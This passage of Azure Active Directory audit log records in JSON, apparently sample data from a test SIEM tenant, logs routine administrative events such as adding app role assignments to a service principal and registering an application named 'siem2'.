"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": 
"71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": 
"{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": 
"1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": 
"", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, 
{"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": 
"env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": 
"AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, 
{"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, 